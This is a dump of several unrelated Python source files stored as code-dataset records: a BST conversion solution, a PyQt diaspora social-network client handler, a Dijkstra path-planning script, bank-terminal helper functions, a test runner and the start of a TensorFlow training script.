1)\n node.right = helper(a, mid + 1, hi)\n return node\n return helper(nums, 0, len(nums) - 1)\n\n def sortedArrayToBSTV1(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n\n ACE\n\n creates solution like what is shown in problem\n \"\"\"\n def helper(a, lo, hi):\n if hi <= lo:\n return None\n mid = (lo + hi) // 2\n node = TreeNode(a[mid])\n node.left = helper(a, lo, mid)\n node.right = helper(a, mid + 1, hi)\n return node\n return helper(nums, 0, len(nums))\n\n\nif __name__ == '__main__':\n s = Solution()\n tests = [\n [-10,-3,0,5,9]\n ]\n for l in tests:\n # t = deserialize_tree(ser)\n t = s.sortedArrayToBST(l)\n draw_tree(t)\n # assert res == exp\n","sub_path":"108_convert_sorted_array_to_binary_search_tree.py","file_name":"108_convert_sorted_array_to_binary_search_tree.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"522426210","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QFileDialog, QInputDialog\nfrom PyQt5.QtCore import QObject, QThreadPool, QRunnable, pyqtSignal, pyqtSlot\n\n\"\"\" Image resolver / caching \"\"\"\nfrom classes.resolver import resolver\n\n\"\"\" Diaspy \"\"\"\nimport diaspy\nfrom diaspy.errors import DiaspyError\n\n\"\"\" Exceptions \"\"\"\nimport requests\n\"\"\"ReadTimeout requires minimal version of python3-requests 2.11 \nhttps://pypi.python.org/pypi/requests/2.11.1 \"\"\"\nversion = requests.__version__.split('.')\nif int(version[0]) == 2 and int(version[1]) >= 11:\n\tfrom requests import ConnectionError, ReadTimeout\nelse:\n\tfrom requests import ConnectionError\n\tclass ReadTimeout(Exception):\n\t\tpass\n\nclass stream(diaspy.streams.Stream):\n\tdef __init__(self, connection, location=''):\n\t\tself.connection = connection\n\t\tself.location = location\n\t\tdiaspy.streams.Stream.__init__(self, self.connection, location=self.location, fetch=False)\n\n\t\tself.layout = None\n\t\tself.post_widgets = {}\n\n\t\t\"\"\" TODO implement this\n\t\t\tIf more() doesn't give more posts 
then block future calls.\n\t\t\tSo it doesn't keep requesting when there are no more posts.\n\t\t\"\"\"\n\t\tself.no_more = False\n\n\tdef set_layout(self, layout):\n\t\tself.layout = layout\n\nclass aspects(diaspy.streams.Aspects):\n\tdef __init__(self, connection):\n\t\tself.connection = connection\n\t\tdiaspy.streams.Aspects.__init__(self, self.connection, fetch=False)\n\n\t\tself.layout = None\n\t\tself.post_widgets = {}\n\t\tself.no_more = False\n\n\tdef set_layout(self, layout):\n\t\tself.layout = layout\n\nclass handler(QObject):\n\t\"\"\"\n\tThreads and Object storage.\n\t\"\"\"\n\tmessage = pyqtSignal(tuple) # title, message\n\tconnected = pyqtSignal(bool)\n\tauth_status = pyqtSignal(bool)\n\tuserdata_ready = pyqtSignal()\n\ttag_followings_ready = pyqtSignal()\n\tnew_stream = pyqtSignal(str) # str: name\n\tnew_notifications_obj = pyqtSignal()\n\tnew_people_obj = pyqtSignal(str) # str: guid\n\tdef __init__(self):\n\t\tQObject.__init__(self)\n\n\t\tself.connection = None\n\t\tself.search = None\n\n\t\t# Cache people data by guid { guid: peope obj }\n\t\tself.people = {} # will contain people data, inc streams TODO move to people page.\n\t\tself.people_handle_to_guid = {} # key: handle, value: guid\n\n\t\tself.notifications = None\n\n\t\t# Thread pools\n\t\tself.connection_pool = QThreadPool()\n\t\tself.connection_pool.setMaxThreadCount(2)\n\n\t\tself.stream_pool = QThreadPool()\n\t\tself.stream_pool.setMaxThreadCount(3)\n\n\t\tself.notification_pool = QThreadPool()\n\t\tself.notification_pool.setMaxThreadCount(2)\n\n\t\tself.people_pool = QThreadPool()\n\t\tself.people_pool.setMaxThreadCount(2)\n\n\t\tself.people_stream_pool = QThreadPool()\n\t\tself.people_stream_pool.setMaxThreadCount(1)\n\n\t\tself.tag_followings = None\n\t\tself.userdata = None\n\t\tself.contacts = None # expects diaspy.people.Contacts(connection)\n\t\tself.res = None\n\t\tself.publisher = None\n\n\tdef set_contacts(self):\n\t\t# Just init, so connection is there and we are ready to use it.\n\t\tself.contacts = diaspy.people.Contacts(self.connection, fetch=False)\n\n\tdef add_people_obj(self, guid, people_obj):\n\t\tif people_obj and guid:\n\t\t\tself.people.update( { guid: people_obj } )\n\t\t\tif people_obj.data['handle']: # TODO if requested through guid, there is no diaspora_id but there should be in data\n\t\t\t\tself.people_handle_to_guid.update( { people_obj.data['handle'] : guid } )\n\t\t\tself.new_people_obj.emit(guid)\n\n\tdef set_notifications_obj(self, notifications_obj):\n\t\tif notifications_obj:\n\t\t\tself.notifications = notifications_obj\n\t\t\tself.new_notifications_obj.emit()\n\n\tdef set_stream(self, name, stream):\n\t\tif stream:\n\t\t\tself.stream[name] = stream\n\t\t\tself.new_stream.emit(name)\n\n\tdef set_connection(self, connection):\n\t\tif connection:\n\t\t\tself.connection = connection\n\t\t\tself.search = diaspy.search.Search( connection )\n\n\tdef if_connected(self):\n\t\tprint(\"called diaspy_handler.if_connected()\") # DEBUG\n\t\tif self.connection:\n\t\t\tself.res = resolver( self.connection.pod ) # set resolver for images\n\t\t\tself.publisher = diaspy.publisher.Publisher( self.connection )\n\t\t\tself.connected.emit(True)\n\t\telse:\n\t\t\tself.connected.emit(False)\n\n\tdef connect(self, config):\n\t\tprint(\"called diaspy_handler.connect()\") # DEBUG\n\t\tworker = connection_worker('connect', config=config)\n\t\tworker.signals.new_result.connect(self.set_connection)\n\t\tworker.signals.finished.connect(self.if_connected)\n\t\tself.connection_pool.start(worker)\t\n\n\tdef 
disconnect(self):\n\t\tself.connection.logout()\n\t\tself.connection = None\n\t\tself.res = None\n\n\tdef login(self):\n\t\tworker = connection_worker('login', connection=self.connection)\n\t\tworker.signals.status_change.connect( self.auth_status.emit )\n\t\tself.connection_pool.start(worker)\n\n\tdef set_user_data(self, userdata):\n\t\tif userdata:\n\t\t\t#self.userdata = userdata# TODO\n\t\t\tself.userdata_ready.emit()\n\n\tdef get_user_data(self):\n\t\tworker = connection_worker('get_user_data', connection=self.connection)\n\t\tworker.signals.new_result.connect( self.set_user_data )\n\t\tself.connection_pool.start(worker)\n\n\tdef set_tag_followings(self, tag_followings):\n\t\tif tag_followings:\n\t\t\tself.tag_followings = tag_followings\n\t\t\tself.tag_followings_ready.emit()\n\n\tdef get_tag_followings(self):\n\t\tworker = connection_worker('get_tag_followings', connection=self.connection)\n\t\tworker.signals.new_result.connect( self.set_tag_followings )\n\t\tself.connection_pool.start(worker)\n\n\tdef init_notifications(self):\n\t\tself.notifications = notifications(self.connection.__repr__())\n\n\tdef is_connected(self):\n\t\tif self.connection:\n\t\t\treturn True\n\t\treturn False\n\n\"\"\" Post worker \"\"\"\nclass post_signals(QObject):\n\tfinished = pyqtSignal()\n\texception = pyqtSignal(str)\n\tnew_post = pyqtSignal(object) # diaspy.models.Post\n\tnew_comment = pyqtSignal(object) # diaspy.models.Comment\n\tsuccess = pyqtSignal()\n\n\tdef disconnect(self):\n\t\tself.finished.disconnect()\n\t\tself.exception.disconnect()\n\t\tself.new_post.disconnect()\n\nclass post_worker(QRunnable):\n\tdef __init__(self, action, connection=None, post=None, guid=None, id=None, interaction=None, vote_answer_id=None, comment_markdown=None, delete_comment_id=None):\n\t\tsuper(post_worker, self).__init__()\n\t\tself.action = action.lower()\n\t\tself._interaction = interaction\n\t\tself.vote_answer_id = vote_answer_id\n\t\tself.delete_comment_id = delete_comment_id\n\t\tself.comment_markdown = comment_markdown\n\t\tself.__connection = connection\n\t\tself.post = post\n\t\tself.guid = guid\n\t\tself.id = id\n\t\tself.signals = post_signals()\n\n\tdef get(self):\n\t\ttry:\n\t\t\tif self.guid:\n\t\t\t\tpost = diaspy.models.Post(self.__connection, guid=self.guid)\n\t\t\telif self.id:\n\t\t\t\tpost = diaspy.models.Post(self.__connection, id=self.id)\n\t\t\telse:\n\t\t\t\tpass # raise error\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\texcept diaspy.errors.PostError as err:\n\t\t\tprint(\"Could not get post guid:{}, id:{}, err:{}\".format(self.guid, self.id, err)) #DEBUG\n\t\t\tself.signals.exception.emit(\"Could not get post guid:{}, id:{}, err:{}\".format(self.guid, self.id, err))\n\t\telse:\n\t\t\tself.signals.new_post.emit( post )\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef interaction(self):\n\t\t\"\"\" needs to have self._interaction and self.post set\n\t\tself._interaction should be a str containing one of the \n\t\tfollowing:\n\n\t\t\tlike\n\t\t\tunlike\n\t\t\tsubscribe\n\t\t\tunsubscribe\n\t\t\treshare\n\t\t\thide\n\t\t\tdelete\n\t\t\tmute\n\t\t\treport\n\t\t\tvote_poll\n\n\t\tself.post should be a diaspy.models.Post() object\n\t\t\"\"\"\t\n\n\t\ttry:\n\t\t\tif self._interaction == 'like': self.post.like()\n\t\t\telif self._interaction == 'update': self.post.update() # also updates comments\n\t\t\telif self._interaction == 'vote_poll': self.post.vote_poll( self.vote_answer_id ) # requires 
answer_id\n\t\t\telif self._interaction == 'unlike': self.post.delete_like()\n\t\t\telif self._interaction == 'subscribe': self.post.subscribe()\n\t\t\telif self._interaction == 'unsubscribe': self.post.unsubscribe()\n\t\t\telif self._interaction == 'reshare': self.post.reshare()\n\t\t\telif self._interaction == 'hide': self.post.hide()\n\t\t\telif self._interaction == 'delete': self.post.delete()\n\t\t\telif self._interaction == 'mute': self.post.mute()\n\t\t\telif self._interaction == 'report': self.post.report()\n\t\t\telif self._interaction == 'delete_comment': self.post.comments.delete_comment(self.delete_comment_id)\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error, could not {} post: {}\".format(self._interaction, err))\n\t\texcept diaspy.errors.PostError as err: # probably post is deleted.\n\t\t\tself.signals.exception.emit(\"PostError: could not {} post: {}\".format(self._interaction, err))\n\t\telse:\n\t\t\tself.signals.success.emit()\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef comment(self):\n\t\ttry:\n\t\t\tc = self.post.comments.comment(text=self.comment_markdown)\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error, could comment on post: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_comment.emit( c )\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef run(self):\n\t\tprint(\"called post_worker.run() {} {}\".format(self.action, self._interaction))#DEBUG\n\t\tactions = {\n\t\t\t'get'\t\t\t: self.get,\n\t\t\t'interaction'\t: self.interaction,\n\t\t\t'comment'\t\t: self.comment\n\t\t}[self.action]()\n\n\"\"\" Stream worker \"\"\"\nclass stream_signals(QObject):\n\tfinished = pyqtSignal()\n\texception = pyqtSignal(str)\n\tnew_stream = pyqtSignal(object) # object: diaspy.stream.Generic()\n\tnew_post = pyqtSignal(object) # object: diaspy.models.Post()\n\tnew_data = pyqtSignal(str) # str: name\n\nclass stream_worker(QRunnable):\n\tprovider_display_name = 'LionsTooth (development)'\n\tdef __init__(self, action, connection=None, name='', location='', stream=None, post_data=None, aspect_ids_filter=None):\n\t\tsuper(stream_worker, self).__init__()\n\t\tself.action = action.lower()\n\t\tself.location = location\n\t\tself.name = name\n\t\tself.aspect_ids_filter = aspect_ids_filter\n\n\t\t\"\"\" self.post_data = {\n\t\t\t'text'\t\t\t: str(markdown), \n\t\t\t'aspect_ids'\t: [ids], \n\t\t\t'photos\t\t\t: None, \n\t\t\t'photo'\t\t\t: '',\n\t\t\t'poll_question'\t: 'poll_question',\n\t\t\t'poll_answers'\t: ['answer0', 'answer1', ..]\n\t\t} \"\"\"\n\t\tself.post_data = post_data\n\t\tself.__connection = connection\n\t\tself.stream = stream\n\t\tself.signals = stream_signals()\n\n\tdef new_aspects(self):\n\t\ttry:\n\t\t\tprint(\"stream_worker->new_aspects()\")#DEBUG\n\t\t\tnew_stream = aspects(self.__connection)\n\t\t\t#new_stream.fill()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\texcept DiaspyError as err:\n\t\t\tself.signals.exception.emit(\"Diaspy error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_stream.emit(new_stream)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef aspects_filter(self):# used on Aspects stream\n\t\ttry:\n\t\t\tself.stream.filter( self.aspect_ids_filter )\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef 
new(self):\n\t\ttry:\n\t\t\tnew_stream = stream(self.__connection, location=self.location)\n\t\t\tnew_stream.fill()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\texcept DiaspyError as err:\n\t\t\tself.signals.exception.emit(\"Diaspy error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_stream.emit(new_stream)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef fill(self):\n\t\ttry:\n\t\t\tself.stream.fill()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_data.emit(self.name)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef more(self):\n\t\ttry:\n\t\t\tself.stream.more()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_data.emit(self.name)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef update(self):\n\t\ttry:\n\t\t\tself.stream.update()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_data.emit(self.name)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef post(self):\n\t\ttry:\n\t\t\tself.post = self.stream.post(\n\t\t\t\ttext=self.post_data['text'], \n\t\t\t\taspect_ids=self.post_data['aspect_ids'], \n\t\t\t\tphotos=self.post_data['photos'], \n\t\t\t\tphoto=self.post_data['photo'],\n\t\t\t\tpoll_question=self.post_data['poll_question'],\n\t\t\t\tpoll_answers=self.post_data['poll_answers'],\n\t\t\t\tprovider_display_name=self.provider_display_name )\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_post.emit( self.post )\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef run(self):\n\t\tprint(\"called stream_worker.run() {}\".format(self.action))#DEBUG\n\t\tactions = {\n\t\t\t'new'\t\t\t: self.new,\n\t\t\t'post'\t\t\t: self.post,\n\t\t\t'fill'\t\t\t: self.fill,\n\t\t\t'more'\t\t\t: self.more,\n\t\t\t'update'\t\t: self.update,\n\t\t\t'new_aspects'\t: self.new_aspects,\n\t\t\t'aspects_filter': self.aspects_filter\n\t\t}[self.action]()\n\n\"\"\" people worker \"\"\"\nclass people_signals(QObject):\n\tfinished = pyqtSignal()\n\texception = pyqtSignal(str)\n\tnew_obj = pyqtSignal(str, object) # str: guid, object: diaspy.people.User\n\tnew_data = pyqtSignal(str) # str: guid\n\nclass people_worker(QRunnable):\n\tdef __init__(self, action, guid=None, diaspora_id=None, connection=None, people_obj=None):\n\t\tsuper(people_worker, self).__init__()\n\t\tself.action = action\n\t\tself.guid = guid\n\t\tself.diaspora_id = diaspora_id\n\t\tself.people_obj = people_obj\n\t\tself.__connection = connection\n\t\tself.signals = people_signals()\n\n\tdef add_people_obj(self):\n\t\ttry:\n\t\t\tpeople_obj = diaspy.people.User(self.__connection, guid=self.guid, handle=self.diaspora_id, fetch='data')\n\t\t\tpeople_obj.getPhotos() # TODO?\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_obj.emit(people_obj.data['guid'], people_obj)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef get_photos(self):\n\t\ttry:\n\t\t\tself.people_obj.getPhotos()\n\t\texcept (ConnectionError, ReadTimeout) as 
err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef get_userdata(self):\n\t\ttry:\n\t\t\tself.people_obj.fetchguid(fetch_stream=False)\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_data.emit(self.guid)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef fetch_stream(self):\n\t\ttry:\n\t\t\tself.people_obj._fetchstream()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_data.emit(self.guid)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef run(self):\n\t\tprint(\"called people_worker.run() {}\".format(self.action))#DEBUG\n\t\tactions = {\n\t\t\t'add_people_obj'\t: self.add_people_obj,\n\t\t\t'get_userdata'\t\t: self.get_userdata,\n\t\t\t'fetch_stream'\t\t: self.fetch_stream,\n\t\t\t'get_photos'\t\t: self.get_photos\n\t\t}[self.action]()\n\n\"\"\" Connection worker \"\"\"\nclass connection_signals(QObject):\n\tfinished = pyqtSignal()\n\texception = pyqtSignal(str)\n\tnew_result = pyqtSignal(object)\n\tstatus_change = pyqtSignal(bool)\n\nclass connection_worker(QRunnable):\n\tdef __init__(self, action, connection=None, config=None):\n\t\tsuper(connection_worker, self).__init__()\n\t\tself.action = action.lower() # make sure it's always lowercase\n\t\tself.__connection = connection\n\t\tself.__config = config\n\t\tself.signals = connection_signals()\n\n\tdef connect(self):\n\t\tprint(\"called connection_worker.connect()\")#DEBUG\n\t\ttry:\n\t\t\tpod = \"https://{}\".format(self.__config['pod'])\n\t\t\tconnection = diaspy.connection.Connection(pod=pod, username=self.__config['user'], password=self.__config['pass'])\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_result.emit(connection)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef login(self):\n\t\ttry:\n\t\t\tself.__connection.login()\n\t\texcept diaspy.errors.LoginError as err:\n\t\t\tself.signals.exception.emit(\"login() failed: {}\".format(err))\n\t\t\tself.signals.status_change.emit(False)\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error: {}\".format(err))\n\t\t\tself.signals.status_change.emit(False)\n\t\telse:\n\t\t\tself.signals.status_change.emit(True)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef get_user_data(self):\n\t\ttry:\n\t\t\tuserdata = self.__connection.getUserData()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error on getUserData(): {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_result.emit(userdata)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef get_tag_followings(self):\n\t\ttry:\n\t\t\t#following_tags = self.__connection.getTagFollowings()\n\t\t\tfollowing_tags = diaspy.tags.Tags(self.__connection)\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error on getTagFollowings(): {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_result.emit(following_tags)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef run(self):\n\t\tprint(\"called connection_worker.run() {}\".format(self.action)) # DEBUG\n\t\tactions = {\n\t\t\t'connect'\t\t\t\t: self.connect,\n\t\t\t'login'\t\t\t\t\t: 
self.login,\n\t\t\t'get_user_data'\t\t\t: self.get_user_data,\n\t\t\t'get_tag_followings'\t: self.get_tag_followings\n\t\t}[self.action]()\n\n\"\"\" notification worker \"\"\"\nclass notifications_signals(QObject):\n\tfinished = pyqtSignal()\n\texception = pyqtSignal(str)\n\tnew_obj = pyqtSignal(object) # object: diaspy.notifications.Notifications\n\tnew_data = pyqtSignal()\n\nclass notifications_worker(QRunnable):\n\tdef __init__(self, action, connection=None, notifications_obj=None):\n\t\tsuper(notifications_worker, self).__init__()\n\t\tself.action = action\n\t\tself.__connection = connection\n\t\tself.signals = notifications_signals()\n\t\tself.notifications = notifications_obj\n\n\tdef new(self):\n\t\ttry:\n\t\t\tnew_notifications = diaspy.notifications.Notifications(self.__connection)\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error on getTagFollowings(): {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_obj.emit(new_notifications)\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef more(self):\n\t\ttry:\n\t\t\tself.notifications.more()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error on getTagFollowings(): {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_data.emit()\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef update(self):\n\t\ttry:\n\t\t\tself.notifications.update()\n\t\texcept (ConnectionError, ReadTimeout) as err:\n\t\t\tself.signals.exception.emit(\"Connection error on getTagFollowings(): {}\".format(err))\n\t\telse:\n\t\t\tself.signals.new_data.emit()\n\t\tfinally:\n\t\t\tself.signals.finished.emit()\n\n\tdef run(self):\n\t\tprint(\"called notifications_worker.run() {}\".format(self.action))#DEBUG\n\t\tactions = {\n\t\t\t'new'\t\t: self.new,\n\t\t\t'more'\t\t: self.more,\n\t\t\t'update'\t: self.update\n\t\t}[self.action]()\n","sub_path":"classes/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":18842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"574097979","text":"\"\"\"\n * MIT License\n *\n * Copyright (c) 2019 Arpit Aggarwal Markose Jacob\n *\n * Permission is hereby granted, free of charge, to any person obtaining a\n * copy of this software and associated documentation files (the \"Software\"),\n * to deal in the Software without restriction, including without\n * limitation the rights to use, copy, modify, merge, publish, distribute,\n * sublicense, and/or sell copies of the Software, and to permit persons to\n * whom the Software is furnished to do so, subject to the following\n * conditions:\n *\n * The above copyright notice and this permission notice shall be included\n * in all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL\n * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n * DEALINGS IN THE SOFTWARE.\n\"\"\"\n\n# header files\nfrom utils import *\nimport sys\n\n# take start and goal node as input\nstartRow = int(input(\"Enter the row coordinate for start node (between 1 and 200) : \"))\nstartCol = int(input(\"Enter the column coordinate for start node (between 1 and 300) : \"))\ngoalRow = int(input(\"Enter the row coordinate for goal node (between 1 and 200) : \"))\ngoalCol = int(input(\"Enter the column coordinate for goal node (between 1 and 300) : \"))\n\n# define constants\nstart = (startRow, startCol)\ngoal = (goalRow, goalCol)\nclearance = 0\nradius = 0\ndijkstra = Dijkstra(start, goal, clearance, radius)\n\nif(dijkstra.IsValid(start[0], start[1])):\n\tif(dijkstra.IsValid(goal[0], goal[1])):\n\t\tif(dijkstra.IsObstacle(start[0],start[1]) == False):\n\t\t\tif(dijkstra.IsObstacle(goal[0], goal[1]) == False):\n\t\t\t\t(explored_states, backtrack_states, distance_from_start_to_goal) = dijkstra.Dijkstra()\n\t\t\t\tdijkstra.animate(explored_states, backtrack_states, \"./dijkstra_point.avi\")\n\t\t\t\t# print optimal path found or not\n\t\t\t\tif(distance_from_start_to_goal == float('inf')):\n\t\t\t\t\tprint(\"\\nNo optimal path found.\")\n\t\t\t\telse:\n\t\t\t\t\tprint(\"\\nOptimal path found. Distance is \" + str(distance_from_start_to_goal))\n\t\t\telse:\n\t\t\t\tprint(\"The entered goal node is an obstacle \")\n\t\t\t\tprint(\"Please check README.md file for running Dijkstra_point.py file.\")\n\t\telse:\n\t\t\tprint(\"The entered initial node is an obstacle \")\n\t\t\tprint(\"Please check README.md file for running Dijkstra_point.py file.\")\n\telse:\n\t\tprint(\"The entered goal node outside the map \")\n\t\tprint(\"Please check README.md file for running Dijkstra_point.py file.\")\nelse:\n\tprint(\"The entered initial node is outside the map \")\n\tprint(\"Please check README.md file for running Dijkstra_point.py file.\")\n","sub_path":"codes/Dijkstra_point.py","file_name":"Dijkstra_point.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"263630039","text":"def start_session() -> bool:\n \"\"\"Запустить терминал.\"\"\"\n status = input('Запустить терминал? 
y/n: ')\n if status == 'y':\n status = True\n if status == 'n':\n status = False\n return status\n\n\ndef display_board() -> None:\n \"\"\"Терминал с информацией.\"\"\"\n print('Добро пожаловать!')\n print('Выберете цифру для проведения операции')\n\n print('1 -> стать клиентом банка')\n print('2 -> вывести баланс')\n print('3 -> пополнить баланс')\n print('4 -> снять с баланса')\n print('5 -> завершить сеанс')\n\n\ndef set_operation() -> int:\n \"\"\"Выбрать операцию.\"\"\"\n choice = int(input('Операция: '))\n return choice\n\n\ndef clients_dict(clients: dict, id: int, name: str, balance: float) -> dict:\n \"\"\"Словарь клиентов\"\"\"\n clients[id] = {name: balance}\n return clients\n\n\ndef write_account_info(id: int, name: str, balance: float) -> None:\n filename = 'accounts.txt'\n with open(filename, 'a') as f:\n f.write(str(id))\n f.write(name)\n f.write(str(balance))\n\n\ndef read_account_info(id: int, name: str, balance: float) -> None:\n filename = 'accounts.txt'\n with open(filename) as f:\n f.readlines()\n\n\ndef get_name() -> str:\n \"\"\"Запрашивает и возвращает имя клиента.\"\"\"\n name = input('Введите имя: ')\n print(f'Имя: {name} введено.')\n return name","sub_path":"back_account/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"362091153","text":"#-*- coding:utf-8 -*-\nimport unittest\nimport time\nfrom common import HTMLTestRunnerPlugins\nfrom common import sendEmail\nimport getpathInfo\n# from common import readConfig\n\n# read_conf = readConfig.ReadConfig()\non_off = 'on'\n\n# 获取测试用例的文件夹\ncase_dir = './testcase'\n\n# 建立测试报告存放路径\nreport_dir = './report'\n\n# 将需要执行的测试用例添加到测试套件中\ndiscover = unittest.defaultTestLoader.discover(case_dir, pattern=\"test_*\")\n\n# 规定生成测试报告的格式\nnow = time.strftime(\"%Y_%m_%d %H_%M\")\nfile = open(report_dir + '\\\\' + 'report.html', 'wb')\n\n# 实例化对象\nrunner = HTMLTestRunnerPlugins.HTMLTestRunner(\n stream=file,\n title='接口自动化测试报告',\n description='预约--接待--咨询--开单--缴费--核销--出库'\n '报备增删改查-预约增删改查-接待增删改查-咨询增删改查-面诊增删改查',\n verbosity=2,\n retry=0\n )\n\nrunner.run(discover)\nfile.close()\nif on_off == 'on':\n send = sendEmail.SendEmail().sendEmail()\nelse:\n print(\"请在配置中打开发送邮箱开关\")\n","sub_path":"RunAllCase.py","file_name":"RunAllCase.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"69671624","text":"import tensorflow as tf\nimport res18\nimport vgg16\nimport data_csv as data\nimport configure as cf\nimport csv\nimport numpy as np\nimport os\nimport random\n\n#test all the training set using model1, to make next beg.\nf_log = open(cf.TRA_LOG, 'w', newline = '')\nlog_wr = csv.writer(f_log)\nf_beg_pool = open('beg_pool.csv', 'w', newline='')\nbeg_pool_wr = csv.writer(f_beg_pool)\n\n#test_sz set\ntest_sz = 0\nf_temp = open(cf.TRA_CSV, 'r')\nrdr_temp = csv.reader(f_temp)\nfor line in rdr_temp:\n test_sz = test_sz + 1\n beg_pool_wr.writerow(line)\nf_temp.close()\nprint(\"test sz : \" + str(test_sz))\n\nsess = tf.Session()\n\n#model1, model2 build\nimages_model1 = tf.placeholder(tf.float32, [None, 224, 224, 3])\nimages_model2 = tf.placeholder(tf.float32, [None, 224, 224, 3])\nanswers_model1 = tf.placeholder(tf.float32, [None, cf.CLS_NUM])\nanswers_model2 = tf.placeholder(tf.float32, [None, cf.CLS_NUM])\ntrain_mode_model1 = tf.placeholder(tf.bool)\ntrain_mode_model2 = tf.placeholder(tf.bool)\n#model1, test\nnet_model1 = 
